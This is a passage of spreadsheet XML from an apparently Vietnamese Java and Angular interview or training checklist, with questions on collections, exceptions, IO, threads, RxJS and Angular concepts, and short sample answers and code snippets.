        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>LinkedHashSet?</t>
    </r>
  </si>
  <si>
    <t>JI089</t>
  </si>
  <si>
    <t>So sánh sự giống và khác nhau giữa  TreeSet, HashSet, LinkedHashSet?</t>
  </si>
  <si>
    <t>JI090</t>
  </si>
  <si>
    <t>Hiểu về Iterator?</t>
  </si>
  <si>
    <t>JI091</t>
  </si>
  <si>
    <t>Thực hành sử dụng Iterator?</t>
  </si>
  <si>
    <t>JI092</t>
  </si>
  <si>
    <t>Hiểu về Enumeration?</t>
  </si>
  <si>
    <t>JI093</t>
  </si>
  <si>
    <t>Thực hành Enumeration?</t>
  </si>
  <si>
    <t>JI094</t>
  </si>
  <si>
    <t>So sánh giữa Iterator và Enumeration?</t>
  </si>
  <si>
    <t>JI095</t>
  </si>
  <si>
    <t>Map collection</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về đặc điểm interface </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Map</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>JI096</t>
  </si>
  <si>
    <t>Các lớp con của Map?</t>
  </si>
  <si>
    <t>JI097</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>TreeMap,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>HashMap,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>HashTable?</t>
    </r>
  </si>
  <si>
    <t>JI098</t>
  </si>
  <si>
    <t>So sánh sự giống và khác nhau giữa TreeMap, HashMap, HashTable?</t>
  </si>
  <si>
    <t>JI099</t>
  </si>
  <si>
    <t>- Hiểu và thực hành:</t>
  </si>
  <si>
    <t>Generic</t>
  </si>
  <si>
    <t>Hiểu về Generic và các loại Generic Method/Class?</t>
  </si>
  <si>
    <t>JI100</t>
  </si>
  <si>
    <t>Thực hành sử dụng Generic Method và Class?</t>
  </si>
  <si>
    <t>JI101</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Exception: try, catch, finally, throw, throws
+ Error
+ Exception Customize </t>
    </r>
  </si>
  <si>
    <t>Exception and Error</t>
  </si>
  <si>
    <t>Hiểu về Exception và cơ chế handing trong java?</t>
  </si>
  <si>
    <t>JI102</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu mục đích sử dụng của </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>try,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>catch,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>finally,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>throw,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>throws?</t>
    </r>
  </si>
  <si>
    <t>JI103</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">So sánh  được </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Exception</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> vs </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Error?</t>
    </r>
  </si>
  <si>
    <t>JI104</t>
  </si>
  <si>
    <t>So sánh checked và unchecked exception trong java?</t>
  </si>
  <si>
    <t>JI105</t>
  </si>
  <si>
    <t>Thực hành sử dụng checked exception?</t>
  </si>
  <si>
    <t>JI106</t>
  </si>
  <si>
    <t>Thực hành sử dụng unchecked exception?</t>
  </si>
  <si>
    <t>JI107</t>
  </si>
  <si>
    <t>Thực hành về exception handing trong java sử dụng try, catch, finally, throw, throws?</t>
  </si>
  <si>
    <t>JI108</t>
  </si>
  <si>
    <t>Hiểu về exception handing trong các phương thức Overriding and Overloading?</t>
  </si>
  <si>
    <t>JI109</t>
  </si>
  <si>
    <t>Có thể tạo ra 1 lớp Exception Customize đơn gian?</t>
  </si>
  <si>
    <t>JI110</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ File vaf Directory
+ InputStream và OutputStream: FileInputStream, FileOutputStream, ObjectInputStream, ObjectOutputStream
+ Reader và Writer: BufferReader, BufferWriter</t>
    </r>
  </si>
  <si>
    <t>IO</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>File</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Directory?</t>
    </r>
  </si>
  <si>
    <t>JI111</t>
  </si>
  <si>
    <t>Thực hành sử dụng File và Directory?</t>
  </si>
  <si>
    <t>JI112</t>
  </si>
  <si>
    <t>Hiểu về IO Exception?</t>
  </si>
  <si>
    <t>JI113</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về Streams, </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>OutputStream</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>InputStream?</t>
    </r>
  </si>
  <si>
    <t>JI114</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>FileInputStream?</t>
    </r>
  </si>
  <si>
    <t>JI115</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>FileOutputStream?</t>
    </r>
  </si>
  <si>
    <t>JI116</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>ObjectInputStream?</t>
    </r>
  </si>
  <si>
    <t>JI117</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>ObjectOutputStream?</t>
    </r>
  </si>
  <si>
    <t>JI118</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Reader</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Writer?</t>
    </r>
  </si>
  <si>
    <t>JI119</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>BufferReader</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>BufferWriter?</t>
    </r>
  </si>
  <si>
    <t>JI120</t>
  </si>
  <si>
    <t>Hiểu mục đích của serialization?</t>
  </si>
  <si>
    <t>JI121</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành cái đặt </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Serializable</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> interface? </t>
    </r>
  </si>
  <si>
    <t>JI122</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ hiểu về các phương thức equals() và hashcode()
+ có thể override các phương thức equals() và hashcode()
</t>
    </r>
  </si>
  <si>
    <t>Object</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về phương thức </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>equals()?</t>
    </r>
  </si>
  <si>
    <t>JI123</t>
  </si>
  <si>
    <t>Thực hành sử dụng equals()?</t>
  </si>
  <si>
    <t>JI124</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu phương thức </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>hashCode()?</t>
    </r>
  </si>
  <si>
    <t>JI125</t>
  </si>
  <si>
    <t>Thực hành cài đặt hashCode()?</t>
  </si>
  <si>
    <t>JI126</t>
  </si>
  <si>
    <t>Demo so sánh equals() và toán tử "=="?</t>
  </si>
  <si>
    <t>JI127</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Hiểu khái niệm Thread và Multi-Thread
+ Nắm được các cách tạo Thread
+ Áp dụng vào thực tế
</t>
    </r>
  </si>
  <si>
    <t>Thread</t>
  </si>
  <si>
    <t>Hiểu về Thread và Multi-Thread trong java?</t>
  </si>
  <si>
    <t>JI128</t>
  </si>
  <si>
    <t>Hiểu về vòng đời của 1 thread?</t>
  </si>
  <si>
    <t>JI129</t>
  </si>
  <si>
    <t>Cách tạo Thread trong java?</t>
  </si>
  <si>
    <t>JI130</t>
  </si>
  <si>
    <t>Cách tạo multi-thread?</t>
  </si>
  <si>
    <t>JI131</t>
  </si>
  <si>
    <t>Nắm được giống và khác nhau giữa Thread class và Runable interface?</t>
  </si>
  <si>
    <t>JI132</t>
  </si>
  <si>
    <t>Hiểu khái niệm thread-safe và cơ chế synchronization?</t>
  </si>
  <si>
    <t>JI133</t>
  </si>
  <si>
    <t>Thực hành cài đặt thread safe?</t>
  </si>
  <si>
    <t>JI134</t>
  </si>
  <si>
    <t>Hiểu lệnh sleep()?</t>
  </si>
  <si>
    <t>JI135</t>
  </si>
  <si>
    <t>Thực hành sleep()?</t>
  </si>
  <si>
    <t>JI136</t>
  </si>
  <si>
    <t>Hiểu lệnh join()?</t>
  </si>
  <si>
    <t>JI137</t>
  </si>
  <si>
    <t>Thực hành join()?</t>
  </si>
  <si>
    <t>JI138</t>
  </si>
  <si>
    <t>Hiểu lệnh wait()/notify?</t>
  </si>
  <si>
    <t>JI139</t>
  </si>
  <si>
    <t>Thực hành wait()/notify?</t>
  </si>
  <si>
    <t>JI140</t>
  </si>
  <si>
    <t>Nắm được sự khác nhau giữa notify() và notifyAll()?</t>
  </si>
  <si>
    <t>JI141</t>
  </si>
  <si>
    <t>Nắm được sự khác nhau giữa wait() và sleep()?</t>
  </si>
  <si>
    <t>JI142</t>
  </si>
  <si>
    <t>Hiểu về khái niệm deadlock trong lập trình thread?</t>
  </si>
  <si>
    <t>JI143</t>
  </si>
  <si>
    <t>Demo về deadlock trong lập trình thread?</t>
  </si>
  <si>
    <t>JI144</t>
  </si>
  <si>
    <t>JI145</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>Java8</t>
  </si>
  <si>
    <t>Đã tìm hiểu ít nhất 3 điểm mới trong Java 8 chưa (new Java 8 Features)?</t>
  </si>
  <si>
    <t>JI146</t>
  </si>
  <si>
    <t>JI147</t>
  </si>
  <si>
    <t>JI148</t>
  </si>
  <si>
    <t>JI149</t>
  </si>
  <si>
    <t>JI150</t>
  </si>
  <si>
    <t>JI151</t>
  </si>
  <si>
    <t>JI152</t>
  </si>
  <si>
    <t>JI153</t>
  </si>
  <si>
    <t>JI154</t>
  </si>
  <si>
    <t>JI155</t>
  </si>
  <si>
    <t>JI156</t>
  </si>
  <si>
    <t>Angular là gì và tại sao bạn lại muốn học/sử dụng nó?</t>
  </si>
  <si>
    <t>Nêu định nghĩa Angular là một framework JavaScript (TypeScript) mã nguồn mở của Google để xây dựng các ứng dụng web một trang (SPA - Single Page Application). Giải thích các ưu điểm như cấu trúc rõ ràng, hỗ trợ TypeScript, mạnh mẽ cho ứng dụng lớn.</t>
  </si>
  <si>
    <t>Sự khác biệt giữa Angular và AngularJS là gì?</t>
  </si>
  <si>
    <t>Nhấn mạnh rằng chúng là hai framework hoàn toàn khác nhau. AngularJS là phiên bản cũ, dựa trên JavaScript, trong khi Angular (phiên bản 2 trở lên) được viết lại hoàn toàn bằng TypeScript, hiệu suất tốt hơn, có cấu trúc module/component rõ ràng hơn.</t>
  </si>
  <si>
    <t>Component trong Angular là gì? Nó bao gồm những phần nào?</t>
  </si>
  <si>
    <t>Component là khối xây dựng cơ bản của ứng dụng Angular, quản lý một phần giao diện người dùng. Mỗi component bao gồm: + Một Template (HTML) định nghĩa giao diện.
+ Một Class (TypeScript) chứa logic và dữ liệu.
+ Một Metadata (@Component decorator) định nghĩa các thuộc tính như selector, templateUrl, styleUrls.</t>
  </si>
  <si>
    <t>Data Binding trong Angular là gì? Kể tên các loại Data Binding bạn biết.</t>
  </si>
  <si>
    <t>Data binding là cách Angular liên kết dữ liệu giữa TypeScript class và template HTML. Có 3 loại chính:
+ Interpolation ({{ }}): One-way binding từ component đến view.
+ Property Binding ([property]="data"): One-way binding từ component đến thuộc tính của DOM element.
+ Event Binding ((event)="handler()"): One-way binding từ view đến component (ví dụ: bắt sự kiện click).
+ Two-way Data Binding ([(ngModel)]): Kết hợp property binding và event binding, thường dùng với form input.</t>
  </si>
  <si>
    <t>Hiển thị dữ liệu từ component ra giao diện</t>
  </si>
  <si>
    <t>Đồng bộ 2 chiều giữa form input và biến trong component</t>
  </si>
  <si>
    <t>Directive trong Angular là gì? Kể tên các loại Directive bạn biết.</t>
  </si>
  <si>
    <t>Directive là một class cho phép bạn thao tác với DOM. Có 3 loại chính:
+ Component Directives: Các component mà chúng ta đã nói ở trên (thực chất cũng là một loại directive đặc biệt).
+ Structural Directives: Thay đổi cấu trúc DOM (thêm/xóa phần tử). Ví dụ: *ngIf, *ngFor, *ngSwitch.
+ Attribute Directives: Thay đổi giao diện hoặc hành vi của một phần tử. Ví dụ: [ngStyle], [ngClass].</t>
  </si>
  <si>
    <t xml:space="preserve">Service và Dependency Injection (DI) trong Angular là gì và tại sao chúng lại quan trọng?
</t>
  </si>
  <si>
    <t>Service: Là một class chứa logic nghiệp vụ, dữ liệu, hoặc các chức năng có thể tái sử dụng (ví dụ: gọi API, xử lý dữ liệu). Service không gắn với một view cụ thể nào.
Dependency Injection (DI): Là một design pattern mà Angular sử dụng để cung cấp các dependencies (như service) vào các component hoặc service khác. Nó giúp mã nguồn dễ kiểm thử, dễ bảo trì và tái sử dụng hơn.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Module trong Angular là gì? Mục đích của </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>AppModule</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Module (NgModule) là một cách để tổ chức ứng dụng Angular thành các khối chức năng có liên quan. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>AppModule</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> là module gốc (root module) của ứng dụng, là nơi khởi tạo và bootstrapping toàn bộ ứng dụng.</t>
    </r>
  </si>
  <si>
    <t>Routing trong Angular là gì? Tại sao cần dùng Routing trong ứng dụng SPA?</t>
  </si>
  <si>
    <t>Routing cho phép điều hướng giữa các "view" (component) khác nhau trong ứng dụng Single Page Application mà không cần tải lại toàn bộ trang. Nó mô phỏng hành vi của các trang web truyền thống nhưng hiệu quả hơn, mang lại trải nghiệm người dùng liền mạch.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>HttpClient</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> trong Angular dùng để làm gì? Bạn đã từng sử dụng nó chưa?</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>HttpClient</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> là một module trong Angular dùng để thực hiện các yêu cầu HTTP (GET, POST, PUT, DELETE) tới các API backend. Nếu có, hãy nói bạn đã dùng để lấy dữ liệu từ một API giả lập hoặc API thật.</t>
    </r>
  </si>
  <si>
    <t>Arrow function và function thông thường khác gì nhau trong anngular?</t>
  </si>
  <si>
    <t>import { Component } from '@angular/core';
@Component({
  selector: 'app-my-component',
  template: `&lt;button (click)="regularFunction()"&gt;Regular Function&lt;/button&gt;
             &lt;button (click)="arrowFunction()"&gt;Arrow Function&lt;/button&gt;`
})
export class MyComponent {
  name = 'Angular Component';
Regular Function: Sử dụng từ khóa function.
  // Regular Function
  regularFunction() {
    setTimeout(function() {
      // 'this' ở đây sẽ không trỏ đến MyComponent
      // console.log(this.name); // Sẽ báo lỗi hoặc ra undefined
      console.log('Regular function timeout');
    }, 1000);
  }
Arrow Function: Sử dụng cú pháp =&gt;.
  // Arrow Function
  arrowFunction() {
    setTimeout(() =&gt; {
      // 'this' ở đây sẽ trỏ đến MyComponent
      console.log(this.name); // Output: Angular Component
      console.log('Arrow function timeout');
    }, 1000);
  }
}</t>
  </si>
  <si>
    <t>Khái niệm Observer Pattern</t>
  </si>
  <si>
    <t>Observer Pattern (Mẫu thiết kế Observer) là một mẫu thiết kế hành vi (behavioral design pattern) trong lập trình hướng đối tượng. Nó định nghĩa mối quan hệ một-nhiều giữa các đối tượng, sao cho khi một đối tượng thay đổi trạng thái, tất cả các đối tượng phụ thuộc vào nó sẽ được thông báo và tự động cập nhật.
Nói một cách đơn giản, bạn có:
Subject (Chủ thể/Publisher): Đây là đối tượng mà trạng thái của nó có thể thay đổi. Nó duy trì một danh sách các "người theo dõi" (observers) và có khả năng thông báo cho tất cả những người theo dõi này khi có bất kỳ thay đổi nào xảy ra.
Observer (Người quan sát/Subscriber): Đây là các đối tượng muốn biết khi nào trạng thái của Subject thay đổi. Chúng đăng ký với Subject và sẽ được thông báo (thông qua một phương thức cụ thể) mỗi khi Subject có cập nhật.</t>
  </si>
  <si>
    <t>Phân biệt sự khác nhau giữa var, let, const</t>
  </si>
  <si>
    <t>Luôn ưu tiên sử dụng const bất cứ khi nào có thể. Nếu bạn biết giá trị của biến sẽ không thay đổi sau khi khởi tạo, hãy dùng const. Điều này giúp code dễ đọc hơn và tránh các lỗi do vô tình gán lại giá trị.
Nếu bạn biết rằng giá trị của biến sẽ cần thay đổi (ví dụ: trong vòng lặp, bộ đếm), hãy sử dụng let.
Hạn chế hoặc tránh hoàn toàn việc sử dụng var trong code mới. Nó gây ra nhiều vấn đề về phạm vi và hoisting, làm cho code khó hiểu và dễ gặp lỗi hơn. let và const được thiết kế để khắc phục những vấn đề này.</t>
  </si>
  <si>
    <t>Trình bày được ý nghĩa và
khái niệm Dependency Injection trong angularclass MyService {
  constructor(private httpClient: HttpClient) { // MyService nhận dependency từ bên ngoài
    // HttpClient được tiêm vào đây
  }
}</t>
  </si>
  <si>
    <t>Dependency Injection (DI) là một mẫu thiết kế (design pattern) và là một cơ chế mà trong đó các "dependencies" (phụ thuộc) của một đối tượng được "tiêm" (injected) vào nó thay vì đối tượng đó tự tạo ra các dependencies đó.
Để dễ hình dung:
Dependency (Phụ thuộc): Là một đối tượng hoặc một dịch vụ mà một lớp (class) cần để thực hiện công việc của nó.
Ví dụ: Một UserService có thể cần một HttpClient để gọi API. Ở đây, HttpClient là một dependency của UserService.
Ví dụ: Một ProductComponent có thể cần một ProductService để lấy dữ liệu sản phẩm. ProductService là một dependency của ProductComponent.
Injection (Tiêm): Là hành động cung cấp dependency cho một lớp. Thay vì lớp tự new (tạo mới) dependency đó bên trong nó, một cơ chế bên ngoài (Injector) sẽ cung cấp dependency đó cho lớp.</t>
  </si>
  <si>
    <t>RxJS là gì?</t>
  </si>
  <si>
    <t>RxJS (Reactive Extensions for JavaScript) là thư viện lập trình reactive dựa trên Observable. Nó cho phép xử lý các luồng dữ liệu bất đồng bộ như HTTP requests, user events, WebSocket, timers một cách dễ dàng thông qua các operators.</t>
  </si>
  <si>
    <t>this.http.get('/api/users')
  .pipe(
    map(users =&gt; users.filter(u =&gt; u.active))
  )
  .subscribe(data =&gt; {
    console.log(data);
  });</t>
  </si>
  <si>
    <t>Observable là gì?</t>
  </si>
  <si>
    <t>Observable là một nguồn phát dữ liệu theo thời gian. Nó có thể phát nhiều giá trị, xử lý bất đồng bộ và hỗ trợ hủy subscribe.</t>
  </si>
  <si>
    <t>const obs = of(1, 2, 3);
obs.subscribe(value =&gt; {
  console.log(value);
});</t>
  </si>
  <si>
    <t>Observable khác Promise như thế nào?</t>
  </si>
  <si>
    <t>Promise                              Observable
Trả về 1 giá trị                   Trả về nhiều giá trị
Không thể cancel             Có thể unsubscribe
Không có operators mạnh Có rất nhiều operators
Eager execution                Lazy execution</t>
  </si>
  <si>
    <t>Em thường dùng Promise cho các tác vụ đơn giản. Với Angular em ưu tiên Observable vì Angular HttpClient và các event stream đều được xây dựng trên RxJS.</t>
  </si>
  <si>
    <t>Angular HttpClient trả về gì?</t>
  </si>
  <si>
    <t>HttpClient trả về Observable.</t>
  </si>
  <si>
    <t>Ví dụ:
this.http.get&lt;User[]&gt;('/api/users');</t>
  </si>
  <si>
    <t>Kiểu trả về:
Observable&lt;User[]&gt;</t>
  </si>
  <si>
    <t>Các RxJS Operators em đã dùng?</t>
  </si>
  <si>
    <t>map()
.pipe(
  map(users =&gt; users.filter(u =&gt; u.active))
)
Dùng để biến đổi dữ liệu.</t>
